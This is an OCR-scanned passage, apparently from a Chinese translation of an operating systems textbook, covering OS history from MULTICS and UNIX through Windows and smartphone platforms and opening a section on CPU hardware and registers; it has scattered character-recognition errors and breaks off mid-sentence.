简要 地 说 ，MULTICS 在 计算 机 文献 中 播 撤 了 许多 原创 的 概念 ， 但 要 将 其 造成 一 台 真 正 的 机 器 并 想 
实现 商业 上 的 巨大 成 功 的 难度 超出 了 所 有 人 的 预料 。 贝 尔 实验 室 退 出 了 ,通用 电气 公司 也 退出 了 计算 机 
领域 。 但 是 MIT 坚 持 下 来 并 且 最 终 使 MULTICS 成 功 运行 。MULTICS 最 后 成 为 商业 产品 ， 由 购买 了 通用 
电气 公司 计算 机 业务 的 公司 Honeywell 销 售 ， 并 安装 在 世界 各 地 80 多 个 大 型 公司 和 大 学 中 。 尽 管 
MULTICS 的 数量 很 小 ， 但 是 MULTICS 的 用 户 却 非常 忠诚 ， 例 如 ， 通 用 汽车 、 福 特 和 美国 国家 安全 局 直 
到 20 世 纪 90 年 代 后 期 ， 在 试图 让 Honeywell 更 新 其 硬件 多 年 之 后 ， 才 关闭 了 MULTICS 系 统 ， 而 这 已 经 是 
在 MULTICS 推 出 之 后 30 年 了 。 

到 20 世 纪 末 ， 计 算 服 务 的 概念 已 经 被 遗弃 ， 但 是 这 个 概念 却 以 云 计 算 (cloud computing) 的 形式 回 
归 。 在 这 种 形式 中 ， 相 对 小 型 的 计算 机 (包括 智能 手机 、 平 板 电脑 等 ) 连接 到 巨大 的 远程 数据 中 心 的 服 
务 器 ， 本 地 计算 机 处 理 用 户 界 面 ， 而 服务 器 进行 计算 。 回 归 的 动机 可 能 是 多 数 人 不 愿意 管理 日 益 过 分 复 
杂 的 计算 机 系统 ， 宁 可 让 那些 运行 数据 中 心 的 公司 的 专业 团队 去 做 。 电 子 商务 已 经 向 这 个 方向 演化 了 ， 
各 种 公司 在 多 处 理 器 的 服务 器 上 经 营 各 自 的 电子 商场 ， 简 单 的 客户 端 连接 着 多 处 理 器 服务 器 ， 这 同 
MULTICS 的 设计 精神 非常 类 似 。 

尽管 MULTICS 在 商业 上 失败 了 ,但 MULTICS 对 随后 的 操作 系统 (特别 是 UNIX 和 它 的 衍生 系统 ， 
如 FreeBSD、Linux、iOS 以 及 Android) 却 有 着 巨大 的 影响 ， 详 情 请 参阅 有 关 文 献 和 书籍 (Corbat6 等 人 ， 
1972, Corbat6 和 Vyssotsky，1965; Daley 和 Dennis，1968; Organick, 1972; Saltzer，1974) 。 还 有 一 
个 活跃 的 Web 站 点 www.multicians.org ， 上 面 有 大 量 关 于 系统 、 设 计 人 员 及 其 用 户 的 信息 资料 。 

另 一 个 第 三 代 计 算 机 的 主要 进展 是 小 型 机 的 崛起 ， 以 1961 年 DEC 的 PDP-1 作 为 起 点 。PDP-1 计 算 机 
只 有 4K 个 18 位 的 内 存 ， 每 台 售 价 120 000 美 元 (不 到 IBM 7094 的 5%)， 该 机 型 非常 热 销 。 对 于 某 些 非 数 
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值 的 计算 ， 它 和 7094 几 乎 一 样 快 。PDP-1 开 辟 了 一 个 全 新 的 产业 。 很 快 有 了 一 系列 PDP 机 型 (与 IJBM 系 
列 机 不 同 ， 它 们 互 不 兼容 )， 其 顶峰 为 PDP-11。 

曾 参 与 MULTICS 研 制 的 贝尔 实验 室 计 算 机 科学 家 Ken Thompson， 后 来 找到 一 台 无 人 使 用 的 PDP-7 
机 器 ， 并 开始 开发 一 个 简化 的 单 用 户 版 MULTICS。 他 的 工作 后 来 导致 了 UNIX 操 作 系 统 的 诞生 。 接 着 ， 
UNIX 在 学 术 界 、 政 府 部 门 以 及 许多 公司 中 流行 。 

UNIX 的 历史 已 经 在 别处 讲述 了 (例如 Salus，1994)。 这 有 段 故事 的 部 分 放 在 第 10 章 中 介绍 。 现 在 ， 
有 充分 的 理由 认为 ， 由 于 到 处 可 以 得 到 源 代 码 ， 多 个 机 构 发 展 了 自己 的 (不 兼容 ) 版 本 ， 从 而 导致 了 混 
乱 。UNIX 有 两 个 主要 的 版 本 ， 即 AT&T 的 System V 和 加 州 大 学 伯克利 分 校 的 BSD (Berkeley Software 
Distribution) 。 当 然 还 有 一 些小 的 变种 。 为 了 使 编写 的 程序 能 够 在 任何 版 本 的 UNIX 上 运行 ，IEEE 提 出 了 
一 个 UNIX 的 标准 ， 称 作 POSIX， 目 前 大 多 数 UNIX 版 本 都 支持 它 。POSIX 定 义 了 一 个 凡是 UNIX 必 须 支 
持 的 小 型 系统 调用 接口 。 事 实 上 ， 某 些 其 他 操作 系统 也 支持 POSIX 接 口 。 

顺便 值得 一 提 的 是 ， 在 1987 年 ， 本 书 作者 发 布 了 一 个 UNIX 的 小 型 克隆 ， 称 为 MINIX， 用 于 教学 目 
的 。 在 功能 上 ，MINIX 非 常 类 似 于 UNIX， 包 括 对 POSIX 的 支持 。 从 那 时 以 后 ，MINIX 的 原始 版 本 已 经 
演化 为 MINIX 3， 该 系统 是 高 度 模块 化 的 ， 并 专注 于 高 可 靠 性 。 它 具有 快速 检测 和 替代 有 故障 甚至 已 崩 
溃 模 块 〈 如 IO 设备 驱动 器 ) 的 能 力 ， 不 用 重启 也 不 会 干扰 运行 着 的 程序 。 它 致力 于 提高 可 靠 性 和 可 用 
性 。 有 一 本 叙述 其 内 部 操作 并 在 附录 中 列 出 源 代码 的 书 (Tanenbaum 和 Woodhull，2006) ， 该 书 现在 仍 
然 有 售 。 在 www. minix3.org 上 ，MINIX 3 是 免费 使 用 的 〈 包 括 所 有 源 代码 ) 。 

对 UNIX 版 本 免费 产品 (不同 于 教育 目的 ) 的 愿望 ， 促 使 芬兰 学 生 Linus Torvalds 编 写 了 Linux。 这 
个 系统 直接 受到 在 MINIX 上 开发 的 启示 ， 而 且 最 初 支持 各 种 MINIX 的 功能 (例如 MINIX 文 件 系 统 )。 尽 
管 它 已 经 被 很 多 人 通过 多 种 方式 扩展 ， 但 是 该 系统 仍然 保留 了 某 些 与 MINIX 和 UNIX 共 同 的 基本 结构 。 
对 Linux 和 开放 源码 运动 的 具体 历史 感 兴趣 的 读者 可 以 阅读 Glyn Moody (2001) 。 本 书 所 叙述 的 有 关 
UNIX 的 多 数 内 容 ， 也 适用 于 System V、MINIX、Linux 以 及 UNIX 的 其 他 版 本 和 克隆 。 


1.2.4 第 四 代 (198024). 个 人 计算 机 

随 着 LSI (大 规模 集成 ) 电路 的 发 展 ， 在 每 平方 厘米 的 硅 片 芯片 上 可 以 集成 数 千 个 晶体 管 ， 个 人 计 
算 机 时 代 到 来 了 。 从 体系 结构 上 看 ， 个 人 计算 机 (最 早 称 为 微型 计算 机 ) 与 PDP-11 并 无 二 致 ， 但 就 价格 
而 言 却 相去 期 远 。 以 往 ， 公 司 的 一 个 部 门 或 大 学 里 的 一 个 院 系 才 配 备 一 台 小 型 机 ， 而 微 处 理 器 却 使 每 个 
人 都 能 拥有 自己 的 计算 机 。 

1974 年 ， 当 Intel 8080 一 一 第 一 代 通 用 8 位 CPU 出 现时 ，Intel 希 望 有 一 个 用 于 8080 的 操作 系统 ， 部 分 
是 为 了 测试 目的 。Intel 请 求 其 顾问 Gary Kildall 编 写 。Kildall 和 一 位 朋友 首先 为 新 推出 的 Shugart 
Associates 8 英寸 软盘 构造 了 一 个 控制 器 ， 并 把 这 个 软磁盘 同 8080 相连 ， 从 而 制造 了 第 一 个 配 有 磁盘 的 
微型 计算 机 。 然 后 Kildall 为 它 写 了 一 个 基于 磁盘 的 操作 系统 ， 称 为 CP/M (Control Program for 
Microcomputer)。 由 于 Intel 不 认为 基于 磁盘 的 微型 计算 机 有 什么 前 景 , 所 以 当 Kildall 要 求 CP/M 的 版 权时 ， 
Intel 同 意 了 他 的 要 求 。Kildall 于 是 组 建 了 一 家 公司 Digital Research， 进 一 步 开 发 和 销售 CP/M。 

1977 年 ，Digital Research 重 写 了 CP/M， 使 其 可 以 在 使 用 8080、Zilog Z80 以 及 其 他 CPU 芯片 的 多 种 
微型 计算 机 上 运行 ， 从 而 完全 控制 了 微型 计算 机 世界 达 5 年 之 久 。 

在 20 世 纪 80 年 代 早期 IBM 设计 了 IBM PC 并 寻找 可 在 上 面 运行 的 软件 。 来 自 IBM 的 人 员 同 Bill Gates 
联系 有 关 他 的 BASIC 解 释 器 的 许可 证 事宜 ， 他 们 也 询问 他 是 否 知道 可 在 PC 上 运行 的 操作 系统 。Gates 建 议 
IBM 同 Digital Research 联 系 ， 即 当时 世界 上 主宰 操作 系统 的 公司 。 在 做 出 毫 无 疑问 是 近代 历史 上 最 糟 的 商 
业 决 策 后 ，Kildall 拒 绝 与 IBM 会 见 ， 代 替 他 的 是 一 位 次 要 人 员 。 更 糟糕 的 是 ， 他 的 律师 甚至 拒绝 签署 ITBM 
的 有 关 尚未 公开 的 PC 的 保密 协议 。 结 果 ，IBM 回 头 询问 Gates 可 否 提 供给 他 们 一 个 操作 系统 。 

在 IBM 返 回来 时 ，Gates 了 解 到 一 家 本 地 计算 机 制造 商 Seattle Computer Products 有 合适 的 操作 系统 
DOS (Disk Operating System) 。 他 联系 对 方 并 提出 购买 (宣称 75 000 美 元 ) ， 对 方 接受 了 。 然 后 Gates 提 
供给 IBM 成 套 的 DOS/BASIC，IBM 也 接受 了 。IBM 和 希望 做 某 些 修改 ， 于 是 Gates 雇 人 了 写 DOS 的 作者 
` Tim Paterson 进 行 修改 。 修 改版 称 为 MS-DOS (MicroSoft Disk Operating System ) ， 并 且 很 快 主导 了 IBM 
PC 市 场 。 同 Kildall 试 图 将 CP/M 每 次 卖 给 用 户 一 个 产品 相 比 (至少 开始 是 这 样 )， 这 里 一 个 关键 因素 是 
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Gates 极 其 聪明 的 决策 一 一 将 MS-DOS 与 计算 机 公司 的 硬件 捆绑 在 一 起 出 售 。 在 所 有 这 一 切 烟 消 云 散 之 后 ， 
Kildall 突 然 不 幸 去 世 ， 其 原因 从 来 没有 公布 过 。 

1983 年 ，IBM PC 后 续 机 型 IBM PC/AT 推 出 ， 配 有 Intel 80286 CPU。 此 时 ，MS-DOS 已 经 确立 了 地 
位 ， 而 CP/M 只 剩 下 最 后 的 支撑 。MS-DOS 后 来 在 80386 和 80486 中 得 到 广泛 的 应 用 。 尽 管 MS-DOS 的 早 
期 版 本 是 相当 原始 的 ， 但 是 后 期 的 版 本 提供 了 更 多 的 先进 功能 ， 包 括 许 多 源 自 UNIX 的 功能 。( 微 软 对 
UNIX 是 如 此 娴熟 ， 甚 至 在 公司 的 早期 销售 过 一 个 微型 计算 机 版 本 ， 称 为 XENIX。) 

用 于 早期 微型 计算 机 的 CP/M、MS-DOS 和 其 他 操作 系统 ， 都 是 通过 键盘 输入 命令 的 。 由 于 Doug 
Engelbart 于 20 世 纪 60 年 代 在 斯 坦 福 研究 院 (Stanford Research Institute) 工作 ， 这 种 情况 最 终 有 了 改变 。 
Doug Engelbart 发 明了 图 形 用 户 界面 ， 包 括 窗口 、 图 标 、 菜 单 以 及 鼠标 。 这 些 思想 被 Xerox PARC 的 研究 
人 员 采 用 ， 并 用 在 了 他 们 所 研制 的 机 器 中 。 

一 天 ， Steve Jobs (他 和 其 他 人 一 起 在 车 库 里 发 明了 全 果 计 算 机 ) 访问 PARC， 一 看 到 GUI， 立 即 
意识 到 它 的 潜在 价值 ， 而 Xerox 管 理 层 恰好 没有 认识 到 。 这 种 战略 失误 的 庞大 比例 ， 导 致 名 为 《摸索 未 
来 》 一 书 的 出 版 (Smith 和 Alexander，1988)。Jobs 随 后 着 手 设 计 了 带 有 GUI 的 苹果 计算 机 。 这 个 项 目 
导致 了 Lisa 的 推出 ， 但 是 Lisa 过 于 昂贵 ， 所 以 在 商业 上 失败 了 。Jobs 的 第 二 次 尝试 ， 即 苹果 Macintosh， 
取得 了 巨大 的 成 功 ， 这 不 仅 是 因为 它 比 Lisa 便 宜 得 多 ， 而 且 它 还 是 用 户 友好 的 〈user friendly) ， 也 就 是 
说 ， 它 是 为 那些 不 仅 没 有 计算 机 知识 而 且 根 本 不 打算 学 习 计算 机 的 用 户 准备 的 。 在 图 形 设计 、 专 业 数 
码 摄影 以 及 专业 数字 视频 制作 的 创意 世界 里 ，Macintosh 得 到 广泛 的 应 用 ， 这 些 用 户 对 华 果 公司 及 
Macintosh 有 着 极 大 的 热情 。1999 年 ， 苹 果 公 司 采 用 了 一 种 内 核 ， 它 来 自 本 是 为 替换 BSD UNIX 内 核 而 
开发 的 卡 内 基 ' 梅 隆 大 学 的 Mach 微 核 。 因 此 ， 尽 管 有 着 截然 不 同 的 界面 ， 但 MAC OS X 是 基于 UNIX 
的 操作 系统 。 

在 微软 决定 构建 MS-DOS 的 后 继 产 品 时 ， 受 到 了 Macintosh 成 功 的 巨大 影响 。 微 软 开发 了 名 为 
Windows 的 基于 GUI 的 系统 ， 早 期 它 运 行 在 MS-DOS 上 层 (ERR shell 而 不 像 真正 的 操作 系统 )。 在 从 
1985 年 至 1995 年 的 十 年 间 ，Windows 只 是 运行 在 MS-DOS 上 层 的 一 个 图 形 环境 。 然 而 ， 到 了 1995 年 ， 一 
个 独立 的 Windows 版 本 一 一 具有 许多 操作 系统 功能 的 Windows 95 发 布 了 。Windows 95 仅 仅 把 底层 的 MS- 
DOS 作 为 启动 和 运行 老 的 MS-DOS 程 序 之 用 。1998 年 ， 一 个 稍 做 修改 的 系统 Windows 98 发 布 。 不 过 
Windows 95 和 Windows 98 仍 然 使 用 了 大 量 16 位 Intel 汇编 语言 。 

另 一 个 微软 操作 系统 是 Windows NT (NT 表示 新 技术 ) ， 它 在 一 定 的 范围 内 同 Windows 95 兼 容 ， 但 
是 内 部 是 完全 新 编写 的 。 它 是 一 个 32 位 系统 。Windows NT 的 首席 设计 师 是 David Cutler， 他 也 是 VAX 
VMS 操作 系统 的 设计 师 之 一 ， 所 以 有 些 VMS 的 概念 用 在 了 NT 上 。 事 实 上 ，NT 中 有 太 多 来 自 VMS 的 思 
想 ， 所 以 VMS 的 所 有 者 DEC 公司 控告 了 微软 公司 。 法 院 对 该 案件 判决 的 结果 引出 了 一 大 笔 需要 用 多 位 数 
字 表 达 的 金钱 。 微 软 公 司 期 待 NT 的 第 一 个 版 本 可 以 消灭 MS-DOS 和 其 他 的 Windows 版 本 ， 因 为 NT 是 一 
个 巨大 的 超级 系统 ， 但 是 这 个 想法 失败 了 。 只 有 Windows NT 4.0 踏 上 了 成 功 之 路 ， 特 别 在 企业 网 络 方面 
取得 了 成 功 。1999 年 年 初 ，Windows NT 5.0 改 名 为 Windows 2000。 微 软 期 望 它 成 为 Windows 98 和 
Windows NT 4.0 的 接替 者 。 

不 过 这 两 个 版 本 都 不 太 成 功 ， 于 是 微软 公司 发 布 了 Windows 98 的 另 一 个 版 本 ， 名 为 Windows Me 
(千年 版 )。2001 年 ， 发 布 了 Windows 2000 的 一 个 稍 加 升级 的 版 本 ， 称 为 Windows XP。 这 个 版 本 的 寿命 
比较 长 (6 年 )， 基 本 上 替代 了 Windows 所 有 原先 版 本 。 

版 本 的 更 替 还 在 继续 。 在 Windows 2000 之 后 ， 微 软 将 Windows 家 族 分 解 成 客户 端 和 服务 器 端 两 条 
路 线 。 客 户 端 基于 XP 及 其 后 代 ， 而 服务 器 端 则 包括 Windows Server 2003 和 Windows 2008, AhmAKA 
统 打造 的 第 三 条 路 线 也 随后 出 现 。 这 些 Windows 版 本 都 以 服务 包 (service pack) 的 形式 派生 出 各 自 的 变 
种 。 这 足以 让 一 些 管理 员 (以 及 操作 系统 书籍 作者 ) 发 疯 。 

2007 年 1 月 ， 微 软 公司 发 布 了 Windows XP 的 后 继 版 ， 名 为 Vista。 它 有 一 个 新 的 图 形 接口 、 改 进 的 安 
全 性 以 及 许多 新 的 或 升级 的 用 户 程序 。 微 软 公司 希望 Vista 能 够 完全 替代 XP， 但 事与愿违 。 相 反 ， 由 于 
对 系统 要 求 高 、 授 权 条 件 严格 以 及 对 数字 版 权 管 理 (Digital Rights Management， 一 种 使 用 户 更 难 复制 
被 保护 资料 的 技术 ) 的 支持 ，Vista 受 到 了 大 量 批 评 ， 负 面 报道 不 断 。 
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随 着 全 新 的 且 并 不 那么 消耗 资源 的 操作 系统 Windows 7 的 到 来 ， 很 多 人 决定 跳 过 Vista。Windows 7 
并 没有 引进 很 多 特性 ， 但 它 相 对 较 小 且 十 分 稳定 。 不 到 三 周 时 间 ，Windows 7 就 抢占 了 比 Vista 七 周 获得 
的 还 多 的 市 场 份 额 。2012 年 ,微软 发 布 了 它 的 后 继 者 ， 即 针对 触摸 屏 、 拥 有 全 新 外 观 和 体验 的 Windows 8, 
微软 希望 这 个 全 新 设计 会 成 为 台式 机 、 便 携 式 电 脑 、 笔 记 本 电脑 、 平 板 电 脑 、 手 机 、 家 庭 影 院 电 脑 等 各 
种 设备 上 的 主流 操作 系统 。 然 而 ， 到 目前 为 止 ， 其 市 场 渗 透 相 比 Windows 7 而 言 要 慢 很 多 。 

个 人 计算 机 世界 中 的 另 一 个 主要 竞争 者 是 UNIX (及 其 各 种 变种 ) 。UNIX 在 网 络 和 企业 服务 器 等 领 
域 很 强大 ， 在 台式 机 、 笔 记 本 电脑 、 平 板 电脑 以 及 智能 手机 上 也 很 常见 。 在 基于 x86 的 计算 机 上 ，Linux 
成 为 学 生 和 不 断 增加 的 企业 用 户 替代 Windows 的 流行 选择 。 

顺便 说 明 一 下 ， 在 本 书 中 我 们 使 用 x86 这 个 术语 代表 所 有 使 用 指令 集体 系 结构 家 族 的 现代 处 理 器 ， 
这 类 处 理 器 的 源头 可 以 追溯 到 20 世 纪 70 年 代 的 8086 芯 片 。 很 多 像 AMD 和 Intel 这 样 的 公司 制造 的 处 理 器 
底层 实现 大 相 径 庭 : 32 位 或 64 位 、 核 或 多 或 少 、 流 水 线 或 深 或 浅 ， 等 等 。 然 而 对 程序 员 而 言 ， 它 们 看 起 
来 都 是 相似 的 ， 并 且 都 能 运行 35 年 前 写 的 8086 代 码 。 在 需要 强调 不 同 处 理 器 的 差异 时 ， 我 们 会 提 到 明确 
的 模型 ,并且 使 用 x86-32 和 x86-64 分 别 表示 32 位 和 64 位 的 变种 。 

FreeBSD 是 一 个 源 自 Berkeley 的 BSD 项 目 ， 也 是 一 个 流行 的 UNIX 变 体 。 所 有 现代 Macintosh 计 算 机 
都 运行 着 FreeBSD 的 某 个 修改 版 。 在 使 用 高 性 能 RISC 芯 片 的 工作 站 上 ，UNIX 系 统 也 是 一 种 标准 配置 。 
它 的 衍生 系统 在 移动 设备 上 被 广泛 使 用 ， 例 如 那些 运行 iD0S 7 和 Android 的 设备 。 

尽管 许多 UNIX 用 户 ， 特 别 是 富有 经 验 的 程序 员 更 偏好 基于 命令 的 界面 而 不 是 GUI， 但 是 几乎 所 有 
的 UNIX 系 统 都 支持 由 MIT 开 发 的 称 为 X Window 的 视窗 系统 (如 众所周知 的 X11)。 这 个 系统 具有 基本 的 
视窗 管理 功能 ， 人 允许 用 户 通 过 鼠标 创建 、 删 除 、 移 动 和 变 比 视窗 。 对 于 那些 希望 有 图 形 系统 的 UNIX 用 
户 ， 通 常 在 XI1 之 上 还 提供 一 个 完整 的 GUI， 如 Gnome 或 KDE， 从 而 使 得 UNIX 在 外 观 和 感觉 上 类 似 于 
Macintosh 或 Microsoft Windows, 

另 一 个 开始 于 20 世 纪 80 年 代 中 期 的 有 趣 发 展 是 ， 那 些 运 行 网 络 操作 系统 和 分 布 式 操作 系统 
(Tanenbaum 和 Van Steen, 2007) 的 个 人 计算 机 网 络 的 增长 。 在 网 络 操作 系统 中 ， 用 户 知道 多 台 计 算 机 
的 存在 ， 能 够 登录 到 一 台 远程 机 器 上 并 将 文件 从 一 台 机 器 复制 到 另 一 台 机 器 ， 每 台 计算 机 都 运行 自己 本 
地 的 操作 系统 ， 并 有 自己 的 本 地 用 户 (或 多 个 用 户 )。 

网 络 操作 系统 与 单 处 理 器 的 操作 系统 没有 本 质 区 别 。 很 明显 ， 它 们 需要 一 个 网 络 接口 控制 器 以 及 一 
些 底层 软件 来 驱动 它 ， 同 时 还 需要 一 些 程序 来 进行 远程 登录 和 远程 文件 访问 ， 但 这 些 附 加 成 分 并 未 改变 
操作 系统 的 本 质 结 构 。 

相反 ， 分 布 式 操作 系统 是 以 一 种 传统 单 处 理 器 操作 系统 的 形式 出 现在 用 户 面前 的 ， 尽 管 它 实 际 上 是 
由 多 处 理 器 组 成 的 。 用 户 应 该 不 知晓 自己 的 程序 在 何 处 运行 或 者 自己 的 文件 存放 于 何 处 ， 这 些 应 该 由 操 
作 系 统 自动 和 有 效 地 处 理 。 

真正 的 分 布 式 操作 系统 不 仅仅 是 在 单机 操作 系统 上 增添 一 小 段 代 码 ， 因 为 分 布 式 系统 与 集中 式 系统 
有 本 质 的 区 别 。 例 如 ， 分 布 式 系统 通常 允许 一 个 应 用 在 多 台 处 理 器 上 同时 运行 ， 因 此 ， 需 要 更 复杂 的 处 
理 器 调度 算法 来 获得 最 大 的 并 行 度 优化 。 

网 络 中 的 通信 延迟 往往 导致 分 布 式 算法 必须 能 适应 信息 不 完备 、 信 息 过 时 甚至 信息 不 正确 的 环境 。 
这 与 单机 系统 完全 不 同 ， 对 于 后 者 ， 操 作 系统 掌握 着 整个 系统 的 完备 信息 。 


1.2.5 BAK (1990 年 至 今 ) :移动 计算 机 

自从 20 世 纪 40 年 代 连 环 温 画 中 的 Dick Tracy 警 探 对 着 他 的 “双向 无 线 电 通 信 腕 表 ” 说 话 开 始 ， 人 们 
就 在 渴望 一 款 无 论 去 哪里 都 可 以 随身 携带 的 交流 设备 。 第 一 台 真 正 的 移动 电话 出 现在 1946 年 并 且 重 达 80 
斤 。 你 可 以 带 它 去 任何 地 方 ， 前 提 是 你 得 有 一 辆 拉 着 它 的 汽车 。 

第 一 台 真 正 的 手持 电话 出 现在 20 世 纪 70 年 代 ， 大 约 2 斤 重 ， 绝 对 属于 轻 量 级 。 它 被 人 们 爱 称 为 “ 夸 
头 "。 很 快 ， 每 个 人 都 想 要 一 块 这 样 的 “砖头 "。 现 在 ， 移 动 电话 已 经 渗 人 全 球 90% 人 口 的 生活 中 。 我 们 
不 仅 可 以 通过 便携 电话 和 腕 表 打 电话 ， 在 不 久 的 将 来 还 可 以 通过 眼镜 和 其 他 可 穿戴 设备 打 电 话 。 而 且 ， 
手机 这 种 东西 已 不 再 那么 引 人 注 目 ， 我 们 在 车 水 马龙 间 从 容 地 收发 邮件 、 上 网 冲浪 、 给 朋友 发 信息 、 玩 
游戏 ， 一 切 都 是 那么 习以为常 。 
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虽然 在 电话 设备 上 将 通话 和 计算 合 二 为 一 的 想法 在 20 世 纪 70 年 代 就 已 经 出 现 了 ， 但 第 一 台 真 正 的 智 
能 手机 直到 20 世 纪 90 年 代 中 期 才 出 现 。 这 部 手机 就 是 诺基亚 发 布 的 N9000， 它 真正 做 到 了 将 通常 处 于 独 
立 工作 状态 的 两 种 设备 合 二 为 一 : 手机 和 个 人 数字 助理 (Personal Digital Assistant, PDA), 19974, 
爱立信 公司 为 它 的 GS88 “Penelope” 手 机 创造 出 术语 智能 手机 (smartphone)。 

随 着 智能 手机 变 得 十 分 普及 ， 各 种 操作 系统 之 间 的 竞争 也 变 得 更 加 激烈 ， 并 且 形 势 比 个 人 电脑 领域 
更 加 模糊 不 清 。 在 编写 本 书 时 ， 谷 歌 公 司 的 Android 是 最 主流 的 操作 系统 ， 而 苹果 公司 的 iOS 也 牢 牢 占据 
次 席 ， 但 这 并 不 会 是 常态 ， 在 接 下 来 的 几 年 可 能 会 发 生 很 大 变化 。 在 智能 手机 领域 唯一 可 以 确定 的 是 ， 
长 期 保持 在 阁 峰 并 不 容易 。 

毕竟 ， 在 智能 手机 出 现 后 的 第 一 个 十 年 中 ， 大 多 数 手 机 自首 款 产品 出 厂 以 来 都 运行 着 Symbian OS, 
Symbian 操作 系统 被 许多 主流 品牌 选中 ， 包 括 三 星 、 索 尼 爱 立信 和 摩托 罗拉 ， 特 别 是 诺基亚 也 选择 了 它 。 
然而 ， 其 他 操作 系统 已 经 开始 侵吞 Symbian 的 市 场 份额 ， 例 如 RIM 公 司 的 Blackberry OS (2002 年 引入 智 
能 手机 ) 和 苹果 公司 的 iOS (2007 年 随 第 一 代 iPhone 发 布 )。 很 多 公司 都 预期 RIM 能 继续 主导 商业 市 场 ， 
而 iOS 会 成 为 消费 者 设备 中 的 王者 。 然 而 ，Symbian 的 市 场 份额 又 跌 。2011 年 ， 诺 基 亚 放弃 Symbian 并 且 
宣布 将 Windows Phone 作 为 自己 的 主流 平台 。 在 一 段 时 间 内 ， 苹 果 公司 和 RIM 公 司 是 市 场 的 宠儿 (虽然 
不 像 曾 经 的 Symbian 那样 占有 绝对 地 位 ) ， 但 谷歌 公司 2008 年 发 布 的 基于 Linux 的 操作 系统 Android， 没 有 
花费 太 长 时 间 就 妃 上 了 它 的 竞争 对 手 。 

对 于 手机 厂商 而 言 ，Android 有 着 开源 的 优势 ， 获 得 许可 授权 后 便 可 使 用 。 于 是 ,厂商 可 以 修改 它 
并 轻松 地 适 配 自 己 的 硬件 设备 。 并 且 ，Android 拥 有 大 量 软件 开发 者 ， 他 们 大 多 通晓 Java 编 程 语 言 。 即 使 
如 此 ， 最 近 几 年 也 显示 出 Android 的 优势 可 能 不 会 持久 ， 并 且 其 竞争 对 手 极其 渴望 从 它 那 里 夺回 一 些 市 
场 份额 。 我 们 将 在 10.8 节 进一步 介绍 Android。 


1.3 “计算 机 硬件 简介 


操作 系统 与 运行 该 操作 系统 的 计算 机 硬件 联系 密切 。 操 作 系 统 扩展 了 计算 机 指令 集 并 管理 计算 机 
的 资源 。 为 了 能 够 工作 ， 操 作 系 统 必须 了 解 大 量 的 硬件 ， 至 少 需要 了 解 硬件 如 何 面 对 程序 员 。 出 于 这 
个 原因 ， 这 里 我 们 先 简要 地 介绍 现代 个 人 计算 机 中 的 计算 机 硬件 ， 然 后 开始 讨论 操作 系统 的 具体 工作 
细节 。 

从 概念 上 讲 ， 一 台 简 单 的 个 人 计算 机 可 以 抽象 为 类 似 于 图 1-6 中 的 模型 。CPU、 内 存 以 及 IO 设备 都 
由 一 条 系统 总 线 连接 起 来 并 通过 总 线 与 其 他 设备 通信 。 现 代 个 人 计算 机 结构 更 加 复杂 ， 包 含 多 重 总 线 ， 
我 们 将 在 后 面 讨论 。 目 前 ， 这 一 模式 还 是 够 用 的 。 在 下 面 各 小 节 中 ， 我 们 将 简要 地 介绍 这 些 部 件 ， 并 且 
讨论 一 些 操 作 系 统 设计 师 所 考虑 的 硬件 问题 。 毫 无 疑问 ， 这 是 一 个 非常 简要 的 概括 介绍 。 现 在 有 不 少 讨 
论 计算 机 硬件 和 计算 机 组 织 的 书籍 。 其 中 两 本 有 名 的 书 分 别 是 Tanenbaum 和 Austin (2012) 以 及 Patterson 
和 Hennessy (2013)。 





图 1-6 简单 个 人 计算 机 中 的 一 些 部 件 
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1.3.1 处 理 器 

计算 机 的 “大 脑 ” 是 CPU， 它 从 内 存 中 取出 指令 并 执行 之 。 在 每 个 CPU 基 本 周期 中 ， 首 先 从 内 存 中 
取出 指令 ， 解 码 以 确定 其 类 型 和 操作 数 ， 接 着 执行 之 ， 然 后 取 指 、 解 码 并 执行 下 一 条 指令 。 按 照 这 一 方 
式 ， 程 序 被 执行 完 

每 个 CPU 都 有 一 套 可 执行 的 专门 指令 集 。 所 以 ，x86 处 理 器 不 能 执行 ARM 程 序 ， 而 ARM 处 理 器 
也 不 能 执行 x86 程 序 。 由 于 用 来 访问 内 存 以 得 到 指令 或 数据 的 时 间 要 比 执行 指令 花费 的 时 间 长 得 多 ， 
因此 ， 所 有 的 CPU 内 都 有 一 些 用 来 保存 关键 变量 和 临时 数据 的 寄存 器 。 这 样 ， 通 常 在 指令 集中 提供 
一 些 指令 ， 用 以 将 一 个 字 从 内 存 调 入 寄存 器 ， 以 及 将 一 个 字 从 寄存 器 存 信 内存。 其 他 的 指令 可 以 把 
来 自 寄 存 器 、 内 存 的 操作 数组 合 ， 或 者 用 两 者 产生 一 个 结果 ， 如 将 两 个 字 相 加 并 把 结果 存在 寄存 器 
或 内 存 中 。 

除了 用 来 保存 变量 和 临时 结果 的 通用 寄存 器 之 外 , 多 数 计算 机 还 有 一 些 对 程序 员 可 见 的 专用 寄存 器 。 
其 中 之 一 是 程序 计数 器 ， 它 保存 了 将 要 取出 的 下 一 条 指令 的 内 存 地 址 。 在 指令 取出 之 后 ， 程 序 计数 器 就 
被 更 新 以 便 指向 后 继 的 指令 。 

另 一 个 寄存 器 是 堆栈 指针 ， 它 指向 内 存 中 当前 栈 的 顶端 。 该 栈 包 含 了 每 个 执行 过 程 的 栈 帧 。 一 个 过 
程 的 栈 帧 中 保存 了 有 关 的 输入 参数 、 局 部 变量 以 及 那些 没有 保存 在 寄存 器 中 的 临时 变量 。 

当然 还 有 程序 状态 字 (Program Status Word, PSW) 寄存 器 。 这 个 寄存 器 包含 了 条 件 码 位 (由 比较 
指令 设置 )、CPU 优 先 级 、 模 式 (用 户 态 或 内 核 态 )， 以 及 各 种 其 他 控制 位 。 用 户 程序 通常 读 入 整个 PSW， 
但 是 ， 只 对 其 中 的 少量 字段 写 入 。 在 系统 调用 和 1/O 中 ，PSW 的 作用 很 重要 。 

操作 系统 必须 知晓 所 有 的 寄存 器 。 在 时 间 多 路 复 用 (time multiplexing) CPU 中 ， 操 作 系 统 经 常会 
中 止 正在 运行 的 某 个 程序 并 启动 (或 再 启动 ) 另 一 个 程序 。 每 次 停止 一 个 运行 着 的 程序 时 ， 操 作 系 统 必 
须 保存 所 有 的 寄存 器 值 ， 这 样 在 稍 后 该 程序 被 再 次 运行 时 ， 可 以 把 这 些 寄 存 器 重新 装 入 。 

为 了 改善 性 能 ，CPU 设 计 师 早 就 放弃 了 同时 读 取 、 解 码 和 执行 一 条 指令 的 简单 模型 。 许 多 现代 CPU 有 具 
